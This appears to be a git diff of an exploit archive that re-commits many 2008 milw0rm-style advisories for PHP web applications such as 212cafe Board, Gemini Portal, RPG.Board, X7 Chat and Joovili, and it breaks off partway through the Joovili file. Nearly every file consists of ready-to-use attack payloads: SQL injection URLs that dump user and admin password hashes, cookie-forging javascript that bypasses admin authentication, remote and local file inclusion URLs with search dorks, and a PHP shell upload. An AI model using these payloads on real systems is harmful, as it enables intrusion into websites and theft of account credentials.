-Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
-Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#####################################################################
-
-# milw0rm.com [2008-09-26]
+===================================================================
+  212cafe Board (view.php qID) Remote SQL Injection Vulnerability
+===================================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+AUTHOR : CWH Underground
+DATE   : 26 September 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+APPLICATION : 212cafe Board 
+VERSION     : 0.07
+VENDOR      : http://www.212cafe.com/
+DOWNLOAD    : http://php.deeserver.net/download/get/12/212cafeboard_v0_07.zip
+#####################################################
+
+--- Remote SQL Injection ---
+
+** Magic Quote must turn off **
+
+-----------------------------------
+ Vulnerable File (view.php)
+-----------------------------------
+
+$query="SELECT * FROM board_question WHERE (qID='$qID')";
+
+---------
+ Exploit
+---------
+
+[+] http://[Target]/[212cafeboard]/view.php?qID=[SQL Injection]
+
+
+------
+ POC
+------
+
+[+] http://[Target]/[212cafeboard]/view.php?qID=-9999')/**/UNION/**/SELECT/**/1,concat(mUser,0x3a3a,mPasswd),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/FROM/**/board_member/**/WHERE/**/(mID='1
+
+
+#####################################################################
+Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
+Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#####################################################################
+
+# milw0rm.com [2008-09-26]
diff --git a/platforms/php/webapps/6579.txt b/platforms/php/webapps/6579.txt
index a96c72725..9d43f3a6e 100755
--- a/platforms/php/webapps/6579.txt
+++ b/platforms/php/webapps/6579.txt
@@ -1,10 +1,10 @@
-###############################################################################################
-[+] Libra PHP File Manager Insecure Cookie Handling Vulnerability
-[+] Discovered By Stack              
-[+] Greetz : All my freind             
-################################################################################################
----
-exploit:
-javascript:document.cookie = "user=1; path=/"; document.cookie = "pass=1; path=/";
-
-# milw0rm.com [2008-09-26]
+###############################################################################################
+[+] Libra PHP File Manager Insecure Cookie Handling Vulnerability
+[+] Discovered By Stack              
+[+] Greetz : All my freind             
+################################################################################################
+---
+exploit:
+javascript:document.cookie = "user=1; path=/"; document.cookie = "pass=1; path=/";
+
+# milw0rm.com [2008-09-26]
diff --git a/platforms/php/webapps/6580.txt b/platforms/php/webapps/6580.txt
index 92cd91083..810795c75 100755
--- a/platforms/php/webapps/6580.txt
+++ b/platforms/php/webapps/6580.txt
@@ -1,9 +1,9 @@
-###############################################################################################
-[+] Atomic Photo Album 1.1.0pre4 Insecure Cookie Handling Vulnerability
-[+] Discovered By Stack              
-[+] Greetz : All my freind             
-################################################################################################
-javascript:document.cookie = "apa_cookie_login=foo; path=/;";
-javascript:document.cookie = "apa_cookie_password=bar; path=/;";
-
-# milw0rm.com [2008-09-26]
+###############################################################################################
+[+] Atomic Photo Album 1.1.0pre4 Insecure Cookie Handling Vulnerability
+[+] Discovered By Stack              
+[+] Greetz : All my freind             
+################################################################################################
+javascript:document.cookie = "apa_cookie_login=foo; path=/;";
+javascript:document.cookie = "apa_cookie_password=bar; path=/;";
+
+# milw0rm.com [2008-09-26]
diff --git a/platforms/php/webapps/6583.txt b/platforms/php/webapps/6583.txt
index 59afb433d..b7477556e 100755
--- a/platforms/php/webapps/6583.txt
+++ b/platforms/php/webapps/6583.txt
@@ -1,35 +1,35 @@
-[~] Esqlanelapse Software Project
-[~]
-[~] version: 2.6.1  & 2.6.2
-[~]
-[~] Insecure Cookie Handling Vulnerability
-[~]
-[~] donwload: http://sourceforge.net/project/showfiles.php?group_id=118575&package_id=129141&release_id=519061
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 26.09.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] contact: zorlu@w.cn
-[~] 
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] -----------------------------------------------------------
-
-Exploit:
-
-javascript:document.cookie = "enombre=nombre; path=/"; document.cookie = "euri=visitor_uri; path=/";
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
-[~]
-[~] yildirimordulari.org  &  r00tsecurity.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-09-26]
+[~] Esqlanelapse Software Project
+[~]
+[~] version: 2.6.1  & 2.6.2
+[~]
+[~] Insecure Cookie Handling Vulnerability
+[~]
+[~] donwload: http://sourceforge.net/project/showfiles.php?group_id=118575&package_id=129141&release_id=519061
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 26.09.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] contact: zorlu@w.cn
+[~] 
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] -----------------------------------------------------------
+
+Exploit:
+
+javascript:document.cookie = "enombre=nombre; path=/"; document.cookie = "euri=visitor_uri; path=/";
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
+[~]
+[~] yildirimordulari.org  &  r00tsecurity.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-09-26]
diff --git a/platforms/php/webapps/6584.txt b/platforms/php/webapps/6584.txt
index af70cd123..bd96487e3 100755
--- a/platforms/php/webapps/6584.txt
+++ b/platforms/php/webapps/6584.txt
@@ -1,63 +1,63 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-The Gemini Portal <= 4.7 / Insecure Cookie Handling Vulnerability 
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-Program: The Gemini Portal
-Version: <= 4.7
-File affected: admin/*
-Download: http://www.arzdev.com/downloads/1/Gemini
-
-
-Found by Pepelux 
-eNYe-Sec - www.enye-sec.org
-
-
->> Program description (by the author website) <<
-
-The Gemini Portal 4 is the most scalable, dynamic, and powerful content 
-management system there is. It is perfect for large business network services, 
-to the simple personal web site for use with PHP and MySQL.', 'The Gemini 
-Portal is a dynamic content management system. It is ideal for any size 
-community, allowing users, moderators, limited admins, and global admins log 
-in. Many of the built in pages use the dynamic database file system (ArzFS) 
-to manipulate files and folders.
-
-
->> Bug <<
-
-You can access to the admin panel altering the cookie and adding a parameter
-in the navigation bar.
-
-
->> Exploit <<
-
-Note: POST is not checked and you can enter all by GET. Also you can create a
-simple perl script to send GET and POST packages.
-
-First step: javascript:document.cookie = "user=admin"
-
-Second step: navigate by the admin panel adding the parameter '&name=users' in 
-the navigation bar. Examples: 
-    
-	to view the main admin panel:
-	http://site/admin.php?page=main&name=users
-
-	to list all forums:
-	http://site/admin.php?page=forums&name=users
-
-	to post a new forum:
-	http://site/admin.php?page=forums&name=users&page=forums&op=newf&fview=Everyone&fpost=Everyone&forumname=WHAT_YOU_WANT&descrip=WHAT_YOU_WANT
-
-	to list articles:
-	http://site/admin.php?page=articles&name=users
-
-	to create a new article:
-	http://site/admin.php?page=articles&name=users&op=newd&dtitle=WHAT_YOU_WANT&ppcontent=WHAT_YOU_WANT&dfolder=0&category=1&autor=admin
-
-	to list all users:
-	http://site/admin.php?page=users&name=users
-
-	to edit the admin profile (you can change the admin password)
-	http://site/admin.php?page=users&op=edi&uid=2&name=users
-
-# milw0rm.com [2008-09-26]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+The Gemini Portal <= 4.7 / Insecure Cookie Handling Vulnerability 
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+Program: The Gemini Portal
+Version: <= 4.7
+File affected: admin/*
+Download: http://www.arzdev.com/downloads/1/Gemini
+
+
+Found by Pepelux 
+eNYe-Sec - www.enye-sec.org
+
+
+>> Program description (by the author website) <<
+
+The Gemini Portal 4 is the most scalable, dynamic, and powerful content 
+management system there is. It is perfect for large business network services, 
+to the simple personal web site for use with PHP and MySQL.', 'The Gemini 
+Portal is a dynamic content management system. It is ideal for any size 
+community, allowing users, moderators, limited admins, and global admins log 
+in. Many of the built in pages use the dynamic database file system (ArzFS) 
+to manipulate files and folders.
+
+
+>> Bug <<
+
+You can access to the admin panel altering the cookie and adding a parameter
+in the navigation bar.
+
+
+>> Exploit <<
+
+Note: POST is not checked and you can enter all by GET. Also you can create a
+simple perl script to send GET and POST packages.
+
+First step: javascript:document.cookie = "user=admin"
+
+Second step: navigate by the admin panel adding the parameter '&name=users' in 
+the navigation bar. Examples: 
+    
+	to view the main admin panel:
+	http://site/admin.php?page=main&name=users
+
+	to list all forums:
+	http://site/admin.php?page=forums&name=users
+
+	to post a new forum:
+	http://site/admin.php?page=forums&name=users&page=forums&op=newf&fview=Everyone&fpost=Everyone&forumname=WHAT_YOU_WANT&descrip=WHAT_YOU_WANT
+
+	to list articles:
+	http://site/admin.php?page=articles&name=users
+
+	to create a new article:
+	http://site/admin.php?page=articles&name=users&op=newd&dtitle=WHAT_YOU_WANT&ppcontent=WHAT_YOU_WANT&dfolder=0&category=1&autor=admin
+
+	to list all users:
+	http://site/admin.php?page=users&name=users
+
+	to edit the admin profile (you can change the admin password)
+	http://site/admin.php?page=users&op=edi&uid=2&name=users
+
+# milw0rm.com [2008-09-26]
diff --git a/platforms/php/webapps/6585.txt b/platforms/php/webapps/6585.txt
index d05a319ad..cff52db04 100755
--- a/platforms/php/webapps/6585.txt
+++ b/platforms/php/webapps/6585.txt
@@ -1,26 +1,26 @@
-**************************************************************************************
-
-Author : By Crackers_Child
-Contact: cashr00t@hotmail.com
-Greetz : str0ke & All My Friends
-
-**************************************************************************************
-Script   : openEngine 2. 0 beta2 Remote File include Vulnerable
-Download :http://downloads.sourceforge.net/openengine/openengine20_beta2.zip?modtime=1203083918&big_mirror=0
-
-**************************************************************************************
-
-Exploit : Site.com/script_path/cms/classes/openengine/filepool.php?oe_classpath=Shellz?
-
-
-**************************************************************************************
-
-Vulberable : include($oe_classpath."/openengine/thumbnail.php"); (filepool.php)
-
-
-**************************************************************************************
-
-N0te : Mubarek Ramazan Bayraminiz Kutlu Olsun Ey Musluman Halki :)
-**************************************************************************************
-
-# milw0rm.com [2008-09-26]
+**************************************************************************************
+
+Author : By Crackers_Child
+Contact: cashr00t@hotmail.com
+Greetz : str0ke & All My Friends
+
+**************************************************************************************
+Script   : openEngine 2. 0 beta2 Remote File include Vulnerable
+Download :http://downloads.sourceforge.net/openengine/openengine20_beta2.zip?modtime=1203083918&big_mirror=0
+
+**************************************************************************************
+
+Exploit : Site.com/script_path/cms/classes/openengine/filepool.php?oe_classpath=Shellz?
+
+
+**************************************************************************************
+
+Vulberable : include($oe_classpath."/openengine/thumbnail.php"); (filepool.php)
+
+
+**************************************************************************************
+
+N0te : Mubarek Ramazan Bayraminiz Kutlu Olsun Ey Musluman Halki :)
+**************************************************************************************
+
+# milw0rm.com [2008-09-26]
diff --git a/platforms/php/webapps/6586.txt b/platforms/php/webapps/6586.txt
index 025d4850f..a90b0bfa1 100755
--- a/platforms/php/webapps/6586.txt
+++ b/platforms/php/webapps/6586.txt
@@ -1,42 +1,42 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-Crux Gallery <= 1.32 / Insecure Cookie Handling Vulnerability 
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-Program: Crux Gallery
-Version: <= 1,32
-File affected: admin/*
-Download: http://www.arzdev.com/downloads/8/Crux
-
-
-Found by Pepelux 
-eNYe-Sec - www.enye-sec.org
-
-
->> Program description (by the author website) <<
-
-Crux Gallery reads directories on a server and listes them with thumbnails for
-the user to view without useing exrta space for thumbnails or extra bandwidth 
-for full images. Each image has other resolutions near them for the user to 
-choose from, including the origional resolution the image is in.
-
->> Bug <<
-
-You can access to the admin panel altering the cookie and adding a parameter
-in the navigation bar.
-
-
->> Exploit <<
-
-Note: POST is not checked and you can enter all by GET. Also you can create a
-simple perl script to send GET and POST packages.
-
-Navigate by the admin panel adding the parameter '&name=users' in the 
-navigation bar. Examples: 
-    
-	to view the main admin panel:
-	http://site/index.php?op=admin&name=users
-
-	to change the admin password:
-	http://site/index.php?op=pass&name=users
-
-# milw0rm.com [2008-09-26]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Crux Gallery <= 1.32 / Insecure Cookie Handling Vulnerability 
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+Program: Crux Gallery
+Version: <= 1,32
+File affected: admin/*
+Download: http://www.arzdev.com/downloads/8/Crux
+
+
+Found by Pepelux 
+eNYe-Sec - www.enye-sec.org
+
+
+>> Program description (by the author website) <<
+
+Crux Gallery reads directories on a server and listes them with thumbnails for
+the user to view without useing exrta space for thumbnails or extra bandwidth 
+for full images. Each image has other resolutions near them for the user to 
+choose from, including the origional resolution the image is in.
+
+>> Bug <<
+
+You can access to the admin panel altering the cookie and adding a parameter
+in the navigation bar.
+
+
+>> Exploit <<
+
+Note: POST is not checked and you can enter all by GET. Also you can create a
+simple perl script to send GET and POST packages.
+
+Navigate by the admin panel adding the parameter '&name=users' in the 
+navigation bar. Examples: 
+    
+	to view the main admin panel:
+	http://site/index.php?op=admin&name=users
+
+	to change the admin password:
+	http://site/index.php?op=pass&name=users
+
+# milw0rm.com [2008-09-26]
diff --git a/platforms/php/webapps/6587.txt b/platforms/php/webapps/6587.txt
index cfb7cc6d0..0d54a5bd3 100755
--- a/platforms/php/webapps/6587.txt
+++ b/platforms/php/webapps/6587.txt
@@ -1,48 +1,48 @@
-[~] The Gemini Portal Multiple Remote File inj.
-[~]
-[~] version: 4.7
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 26.09.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] contact: zorlu@w.cn
-[~] 
-[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...!
-[~] 
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] -----------------------------------------------------------
-
-file 1: gemini/page/forums/bottom.php
-
-c0de:
-
-include($lang);  (line16)
-
-Exploit 1:
-
-http://localhost/script_path/gemini/page/forums/bottom.php?lang=ZoRLu.txt?
-
-file 2: gemini/page/forums/category.php
-
-c0de:
-
-include($lang);  (line 17)
-
-Exploit 2:
-
-http://localhost/script_path/gemini/page/forums/category.php?lang=ZoRLu.txt?
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
-[~]
-[~] yildirimordulari.org  &  r00tsecurity.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-09-26]
+[~] The Gemini Portal Multiple Remote File inj.
+[~]
+[~] version: 4.7
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 26.09.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] contact: zorlu@w.cn
+[~] 
+[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...!
+[~] 
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] -----------------------------------------------------------
+
+file 1: gemini/page/forums/bottom.php
+
+c0de:
+
+include($lang);  (line16)
+
+Exploit 1:
+
+http://localhost/script_path/gemini/page/forums/bottom.php?lang=ZoRLu.txt?
+
+file 2: gemini/page/forums/category.php
+
+c0de:
+
+include($lang);  (line 17)
+
+Exploit 2:
+
+http://localhost/script_path/gemini/page/forums/category.php?lang=ZoRLu.txt?
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
+[~]
+[~] yildirimordulari.org  &  r00tsecurity.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-09-26]
diff --git a/platforms/php/webapps/6589.txt b/platforms/php/webapps/6589.txt
index 65f152a42..cc68428cd 100755
--- a/platforms/php/webapps/6589.txt
+++ b/platforms/php/webapps/6589.txt
@@ -1,31 +1,31 @@
-    _____          ____   _____    ____   _____   __  __    _____   ____
-   /  _  \ /\  /\ / _  \ /  _  \  / ___| /  _  \ /  \/  \  /  _  \ / _  |
-   | | | | \ \/ / ||_| | | | | |  | |    | | | | | \__/ |  | |_| | ||_|_|
-   | | | |  \  /  \__  | | | | |  | |    | | | | | |  | |  |  _  | |   \
-   | |_| |  /  \   __| | | |_| |/\| |__  | |_| | | |  | |/\| | | | | |\ \
-   \_____/ / /\ \ |____/ \_____/\/\____| \_____/ |_|  |_|\/|_| |_| |_| \_|
-           \/  \/
-
-[~] RPG.Board <= 0.0.8Beta2 Remote SQL Injection
-
-[~] Author: 0x90
-
-[~] HomePage: www.0x90.com.ar
-
-[~] Contact: Guns[at]0x90[dot]com[dot]ar
-
-[~] Script: RPG.Board
-
-[~] site: http://rpgmaster.de/viewtopic.php?f=25&t=69
-
-[~] Vulnerability Class: SQL Injection
-
-
-
-[~] Exploit:
-
-Register, login and testing exploit..
-
-http://host/index.php?subtopic&showtopic=-0x90+union+select+null,null,null,concat(user,0x3a,pw),null+from+[PREFIX]userlogin
-
-# milw0rm.com [2008-09-26]
+    _____          ____   _____    ____   _____   __  __    _____   ____
+   /  _  \ /\  /\ / _  \ /  _  \  / ___| /  _  \ /  \/  \  /  _  \ / _  |
+   | | | | \ \/ / ||_| | | | | |  | |    | | | | | \__/ |  | |_| | ||_|_|
+   | | | |  \  /  \__  | | | | |  | |    | | | | | |  | |  |  _  | |   \
+   | |_| |  /  \   __| | | |_| |/\| |__  | |_| | | |  | |/\| | | | | |\ \
+   \_____/ / /\ \ |____/ \_____/\/\____| \_____/ |_|  |_|\/|_| |_| |_| \_|
+           \/  \/
+
+[~] RPG.Board <= 0.0.8Beta2 Remote SQL Injection
+
+[~] Author: 0x90
+
+[~] HomePage: www.0x90.com.ar
+
+[~] Contact: Guns[at]0x90[dot]com[dot]ar
+
+[~] Script: RPG.Board
+
+[~] site: http://rpgmaster.de/viewtopic.php?f=25&t=69
+
+[~] Vulnerability Class: SQL Injection
+
+
+
+[~] Exploit:
+
+Register, login and testing exploit..
+
+http://host/index.php?subtopic&showtopic=-0x90+union+select+null,null,null,concat(user,0x3a,pw),null+from+[PREFIX]userlogin
+
+# milw0rm.com [2008-09-26]
diff --git a/platforms/php/webapps/6590.txt b/platforms/php/webapps/6590.txt
index 386edc497..e4f63be5c 100755
--- a/platforms/php/webapps/6590.txt
+++ b/platforms/php/webapps/6590.txt
@@ -1,13 +1,13 @@
-Dork -  content_by_cat.asp?contentid ''catid'' 
-
-Exploit : 
-
-content_by_cat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,user_name from users
-
-Exploit 2 :
-
-content_by_cat.asp?contentid=-99999999&catid=-99887766 union select 0,null,password,3,accesslevel,5,null,7,8,user_name from users
-
-DownLoad Site : http://camyuva.bel.tr/who.php
-
-# milw0rm.com [2008-09-27]
+Dork -  content_by_cat.asp?contentid ''catid'' 
+
+Exploit : 
+
+content_by_cat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,user_name from users
+
+Exploit 2 :
+
+content_by_cat.asp?contentid=-99999999&catid=-99887766 union select 0,null,password,3,accesslevel,5,null,7,8,user_name from users
+
+DownLoad Site : http://camyuva.bel.tr/who.php
+
+# milw0rm.com [2008-09-27]
diff --git a/platforms/php/webapps/6591.txt b/platforms/php/webapps/6591.txt
index 8d7d61a0c..776480b18 100755
--- a/platforms/php/webapps/6591.txt
+++ b/platforms/php/webapps/6591.txt
@@ -1,9 +1,9 @@
-###############################################################################################
-[+] RPG.Board <= 0.0.8Beta2 Insecure Cookie Handling Vulnerability
-[+] Discovered By Stack             
-[+] Greetz : All my freind            
-################################################################################################
-Exploit:
-javascript:document.cookie = "keep4u=l5_ZrX8; path=/;";
-
-# milw0rm.com [2008-09-27]
+###############################################################################################
+[+] RPG.Board <= 0.0.8Beta2 Insecure Cookie Handling Vulnerability
+[+] Discovered By Stack             
+[+] Greetz : All my freind            
+################################################################################################
+Exploit:
+javascript:document.cookie = "keep4u=l5_ZrX8; path=/;";
+
+# milw0rm.com [2008-09-27]
diff --git a/platforms/php/webapps/6592.txt b/platforms/php/webapps/6592.txt
index 3da37953b..d610dd811 100755
--- a/platforms/php/webapps/6592.txt
+++ b/platforms/php/webapps/6592.txt
@@ -1,47 +1,47 @@
-====================================================================
-
-
-  [o] X7 Chat <= 2.0.1A1 Local File Inclusion Vulnerability
-
-       Software : X7 Chat version 2.0.5.1
-       Vendor   : http://x7chat.com/
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-
-
-====================================================================
-
-
-  [o] Vulnerable file
-
-       help/mini.php
-
-        include("./help/{$_GET['help_file']}");
-
-
-
-  [o] Exploit
-
-       http://localhost/[path]/help/mini.php?help_file=[LFI]%00
-
-
-
-  [o] Dork
-
-       "powered by x7 chat"
-
-
-====================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ www.mainhack.com ]
-       VOP Crew [ Vaksin13 OoN_BoY Paman ]
-       H312Y yooogy mousekill }^-^{ k1tk4t
-       skulmatic olibekas ulga Cungkee str0ke
-
-        
-====================================================================
-
-# milw0rm.com [2008-09-27]
+====================================================================
+
+
+  [o] X7 Chat <= 2.0.1A1 Local File Inclusion Vulnerability
+
+       Software : X7 Chat version 2.0.5.1
+       Vendor   : http://x7chat.com/
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+
+
+====================================================================
+
+
+  [o] Vulnerable file
+
+       help/mini.php
+
+        include("./help/{$_GET['help_file']}");
+
+
+
+  [o] Exploit
+
+       http://localhost/[path]/help/mini.php?help_file=[LFI]%00
+
+
+
+  [o] Dork
+
+       "powered by x7 chat"
+
+
+====================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ www.mainhack.com ]
+       VOP Crew [ Vaksin13 OoN_BoY Paman ]
+       H312Y yooogy mousekill }^-^{ k1tk4t
+       skulmatic olibekas ulga Cungkee str0ke
+
+        
+====================================================================
+
+# milw0rm.com [2008-09-27]
diff --git a/platforms/php/webapps/6593.txt b/platforms/php/webapps/6593.txt
index c550404dc..0928f0044 100755
--- a/platforms/php/webapps/6593.txt
+++ b/platforms/php/webapps/6593.txt
@@ -1,28 +1,28 @@
-#######################################################################
-#
-# Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability
-#
-#######################################################################
-
-# Bug discovered by elusiven
-# It was priv8
-
-Bug: 
-
-[Target]/[Path]/vbgooglemaphse.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--
-
-or:
-
-[Target]/[Path]/mapa.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--
-
-# Special gr33tz for: my sweet Monia :*
-# gr33tz for: artii2, GrZyB997, Sp!riT, Msb, Adish, Mandr4ke, eXc!t3, aqtyq, tescik2, stranger, Voldo, KrafT,
-# DonJapkO, Gaara, br0wdz, uncalled, cOndemned aka f60.1, zbt, matisto, pr0metheus and all gd pplz from the underground.
-
-#################################################
-#
-# Vbgooglemap Hotspot Edition 1.0.3 SQL INJECTION
-#
-#################################################
-
-# milw0rm.com [2008-09-27]
+#######################################################################
+#
+# Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability
+#
+#######################################################################
+
+# Bug discovered by elusiven
+# It was priv8
+
+Bug: 
+
+[Target]/[Path]/vbgooglemaphse.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--
+
+or:
+
+[Target]/[Path]/mapa.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--
+
+# Special gr33tz for: my sweet Monia :*
+# gr33tz for: artii2, GrZyB997, Sp!riT, Msb, Adish, Mandr4ke, eXc!t3, aqtyq, tescik2, stranger, Voldo, KrafT,
+# DonJapkO, Gaara, br0wdz, uncalled, cOndemned aka f60.1, zbt, matisto, pr0metheus and all gd pplz from the underground.
+
+#################################################
+#
+# Vbgooglemap Hotspot Edition 1.0.3 SQL INJECTION
+#
+#################################################
+
+# milw0rm.com [2008-09-27]
diff --git a/platforms/php/webapps/6594.txt b/platforms/php/webapps/6594.txt
index 834fddc6d..aab8e7564 100755
--- a/platforms/php/webapps/6594.txt
+++ b/platforms/php/webapps/6594.txt
@@ -1,18 +1,18 @@
-[+] CameraLife-2.6.2b4 Arbitrary File Upload Vulnerability
-
-[+] Author:Mi4night
-
-[+] Version:cameralife-2.6.2b4
-
-[+] Download Script:
-[+] http://sourceforge.net/project/showfiles.php?group_id=70910&package_id=70316&release_id=628868
-
-[+] Exploit:
-[+] http://127.0.0.1/cameralife/images/photos/upload/Mi4night/yourshell.php
-
-[+] Description:
-[+] After registering you can upload php files which you can access just like in the exploit section! Change Mi4night with your username.
-
-[+] Greets to : nuclear, cAs,zYzTeM, Sys32-Hack, Pepe, G-Emp!RE, ThaWhiteNigga, *Z.i.P*,THE_MAN, I-O-W-A, Digitalfortress, DiGitalX, sys32r, pentest, Pig, d3v1l, watchdog, Gibon
-
-# milw0rm.com [2008-09-27]
+[+] CameraLife-2.6.2b4 Arbitrary File Upload Vulnerability
+
+[+] Author:Mi4night
+
+[+] Version:cameralife-2.6.2b4
+
+[+] Download Script:
+[+] http://sourceforge.net/project/showfiles.php?group_id=70910&package_id=70316&release_id=628868
+
+[+] Exploit:
+[+] http://127.0.0.1/cameralife/images/photos/upload/Mi4night/yourshell.php
+
+[+] Description:
+[+] After registering you can upload php files which you can access just like in the exploit section! Change Mi4night with your username.
+
+[+] Greets to : nuclear, cAs,zYzTeM, Sys32-Hack, Pepe, G-Emp!RE, ThaWhiteNigga, *Z.i.P*,THE_MAN, I-O-W-A, Digitalfortress, DiGitalX, sys32r, pentest, Pig, d3v1l, watchdog, Gibon
+
+# milw0rm.com [2008-09-27]
diff --git a/platforms/php/webapps/6595.txt b/platforms/php/webapps/6595.txt
index 870c33b4e..b02a8dfb9 100755
--- a/platforms/php/webapps/6595.txt
+++ b/platforms/php/webapps/6595.txt
@@ -1,48 +1,48 @@
-Joovili <= 3.0 SQL Injection Vulnerability
-
-Author: ~!Dok_tOR!~
-Date found: 27.08.08
-Product: Joovili
-Version: 3.0
-Price: $155  
-URL: www.joovili.com
-Download script: http://rapidshare.com/files/96178834/Joovili.Patch.3.0.1__2.Themes.WST.rar.html
-Vulnerability Class: SQL Injection
-Condition: magic_quotes_gpc = Off
-
-http://localhost/[installdir]/search.php
-
-Search Music:
-
-Exploit 1: 
-
-'+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8+from+joovili_users/*
-
-Exploit 2:
-
-'+union+select+1,2,3,concat_ws(0x3a,admin_username,admin_password),5,6,7,8+from+joovili_admins/*
-
-
-Exploit 1:
-
-http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a,username,password),user(),version(),6+from+joovili_users/*
-
-Exploit 2:
-
-http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a,admin_username,admin_password),user(),version(),6+from+joovili_admins/*
-
-Exploit 1:
-
-http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15+from+joovili_users/*
-
-Exploit 2:
-
-http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3a,admin_username,admin_password),4,5,6,7,8,9,10,11,12,13,14,15+from+joovili_admins/*
-
-
-http://localhost/[installdir]/view.group.php?id='+union+select+1,2,user(),4,5,6,7,8,9/*
-http://localhost/[installdir]/view.music.php?id='+union+select+1,2,3,version(),5,6,7,8/*
-http://localhost/[installdir]/view.picture.php?id='+union+select+1,user(),3,4,5,6,7/*
-http://localhost/[installdir]/view.video.php?id='+union+select+1,2,3,user(),5,6,7,8/*
-
-# milw0rm.com [2008-09-27]
+Joovili <= 3.0 SQL Injection Vulnerability
+
+Author: ~!Dok_tOR!~
+Date found: 27.08.08
+Product: Joovili
+Version: 3.0
+Price: $155  
+URL: www.joovili.com
